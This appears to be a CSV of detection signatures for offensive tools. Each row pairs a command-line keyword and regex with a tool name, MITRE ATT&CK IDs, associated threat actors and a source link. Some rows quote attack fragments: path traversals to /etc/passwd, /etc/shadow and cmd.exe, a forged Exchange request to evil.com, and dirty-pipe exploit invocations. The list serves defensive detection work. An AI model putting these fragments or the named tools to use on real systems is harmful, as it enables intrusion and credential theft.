"*.*autodiscover\.json.*Powershell.*",".{0,1000}\..{0,1000}autodiscover\\\.json\..{0,1000}Powershell\..{0,1000}","offensive_tool_keyword","POC","forged request. exemple: autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com","T1190 - T1140 - T1564 - T1204 - T1505","TA0001 - TA0005","N/A","N/A","Exploitation tool","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4094"
"*... every office needs a tool like Georg*",".{0,1000}\.\.\.\severy\soffice\sneeds\sa\stool\slike\sGeorg.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","4095"
"*../../../../../../etc/passwd*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","4097"
"*../../../../../../etc/shadow*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/shadow.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","4098"
"*..\..\..\..\..\..\..\windows\system32\cmd.exe /c *",".{0,1000}\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\windows\\system32\\cmd\.exe\s\/c\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","4100"
"*./*octopus.py*",".{0,1000}\.\/.{0,1000}octopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","#linux","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","4102"
"*./agscript *",".{0,1000}\.\/agscript\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4103"
"*./agscript * nemesis-bot *",".{0,1000}\.\/agscript\s.{0,1000}\snemesis\-bot\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","4104"
"*./AutoSUID.sh*",".{0,1000}\.\/AutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","4105"
"*./awsloot *",".{0,1000}\.\/awsloot\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","0","#linux","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","4106"
"*./awsloot.py*",".{0,1000}\.\/awsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","#linux","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","4107"
"*./backdoor.sh *",".{0,1000}\.\/backdoor\.sh\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","#linux","N/A","10","4","328","85","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z","4108"
"*./Brutesploit*",".{0,1000}\.\/Brutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","#linux","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","4110"
"*./c2lint *",".{0,1000}\.\/c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","4111"
"*./chisel *",".{0,1000}\.\/chisel\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","Black Basta","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4113"
"*./cowpy.sh *",".{0,1000}\.\/cowpy\.sh\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","0","#linux","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z","4116"
"*./cowroot*",".{0,1000}\.\/cowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/exrienz/DirtyCow","1","0","#linux","N/A","N/A","1","28","25","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z","4117"
"*./CVE-202* -*","\.\/CVE\-20.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","#linux","N/A","N/A","1","37","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z","4118"
"*./dcow -s*",".{0,1000}\.\/dcow\s\-s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/gbonacini/CVE-2016-5195","1","0","#linux","N/A","N/A","4","326","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z","4119"
"*./dedsec_ransomware*",".{0,1000}\.\/dedsec_ransomware.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","#linux","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","4120"
"*./Dent -*",".{0,1000}\.\/Dent\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","0","#linux","N/A","10","10","296","46","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z","4121"
"*./dirty*",".{0,1000}\.\/dirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/FireFart/dirtycow","1","0","#linux","N/A","N/A","9","884","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z","4122"
"*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/bbaranoff/CVE-2022-0847","1","1","#linux","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z","4123"
"*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","#linux","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z","4124"
"*./dnscat*",".{0,1000}\.\/dnscat.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","4125"
"*./dome.py*",".{0,1000}\.\/dome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","#linux","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","4126"
"*./donut *.exe*",".{0,1000}\.\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#linux","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","4127"
"*./dynasty.sh*",".{0,1000}\.\/dynasty\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","4129"
"*./encryptor -f *.exe*",".{0,1000}\.\/encryptor\s\-f\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#linux","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","4130"
"*./evil-proxy*",".{0,1000}\.\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","#linux","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","4132"
"*./Exfil.sh*",".{0,1000}\.\/Exfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","4133"
"*./exploit /etc/passwd 1 *cat /etc/passwd*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\s.{0,1000}cat\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xIronGoat/dirty-pipe","1","0","#linux","N/A","N/A","1","10","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z","4135"
"*./exploit /etc/passwd 1 ootz:*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\sootz\:.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ahrixia/CVE_2022_0847","1","0","#linux","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z","4136"
"*./fake-sms*",".{0,1000}\.\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","#linux","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","4137"
"*./fee.py*",".{0,1000}\.\/fee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","4138"
"*./fscan*",".{0,1000}\.\/fscan.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","4140"
"*./gcr.py*",".{0,1000}\.\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","#linux","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","4141"
"*./getExploit*",".{0,1000}\.\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z","4142"
"*./gimmeSH*",".{0,1000}\.\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 - T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/A3h1nt/gimmeSH","1","1","#linux","N/A","N/A","2","183","28","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z","4143"
"*./GoAWSConsoleSpray*",".{0,1000}\.\/GoAWSConsoleSpray.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","#linux","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","4144"
"*./go-secdump*",".{0,1000}\.\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","#linux","N/A","10","5","457","51","2025-02-21T19:16:11Z","2023-02-23T17:02:50Z","4145"
"*./GoStompy *",".{0,1000}\.\/GoStompy\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","#linux","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","4146"
"*./hashcat -*",".{0,1000}\.\/hashcat\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","#linux","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","4147"
"*./hashview/*",".{0,1000}\.\/hashview\/.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","#linux","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","4148"
"*./Havoc",".{0,1000}\.\/Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","#linux","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","4149"
"*./havoc *",".{0,1000}\.\/havoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#linux","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","4150"
"*./hoaxshell*",".{0,1000}\.\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#linux","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","4151"
"*./hping *",".{0,1000}\.\/hping\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","#linux","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","4152"
"*./hydra *",".{0,1000}\.\/hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","4153"
"*./inceptor.py*",".{0,1000}\.\/inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","#linux","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","4154"
"*./injector -*",".{0,1000}\.\/injector\s\-.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","4155"
"*./iodined*",".{0,1000}\.\/iodined.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","4156"
"*./Ivy -*",".{0,1000}\.\/Ivy\s\-.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#linux","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","4157"
"*./kali-install.sh*",".{0,1000}\.\/kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","#linux","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","4158"
"*./kerbrute *",".{0,1000}\.\/kerbrute\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","#linux","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","4159"
"*./koadic*",".{0,1000}\.\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","#linux","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","4160"
"*./kubestroyer*",".{0,1000}\.\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","#linux","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","4161"
"*./Lalin.sh*",".{0,1000}\.\/Lalin\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","1","#linux","N/A","N/A","4","366","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z","4162"
"*./litefuzz.py*",".{0,1000}\.\/litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","1","#linux","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","4163"
